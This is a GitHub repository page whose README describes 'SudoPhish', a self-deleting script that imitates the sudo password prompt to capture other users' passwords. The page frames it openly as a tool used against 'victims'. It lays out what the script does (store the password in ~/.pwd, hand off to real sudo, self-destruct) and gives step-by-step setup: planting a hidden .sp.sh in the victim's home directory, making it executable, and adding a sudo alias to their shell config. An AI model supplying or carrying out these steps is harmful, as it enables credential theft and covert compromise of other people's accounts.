Skip to content

MichaelDim02/SudoPhish

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

SudoPhish

A short self-destructive script to phish the passwords of the users on your system.

What it does

  • It pretends to be the Sudo password prompt and asks the victim for their password
  • Saves the password in a text file ( ~/.pwd )
  • Redirects the user to real sudo
  • Self-destructs

How to set up manually

  • Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with #!/bin/bash, if they use zsh, then make sure it starts with #!/bin/zsh etc. It does not work with fish. Default is bash.
  • Set the $shellfile variable accordingly (line 21). Default is ".bashrc"
  • Put the following line at the END of the Shell config file: alias sudo=".sp.sh; sudo"
  • Move the file to the victims home directory, rename it to .sp.sh and give it executable permission with chmod +x .sp.sh

About

A short script to phish passwords on your system

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Sponsor this project

 

Packages

No packages published

Languages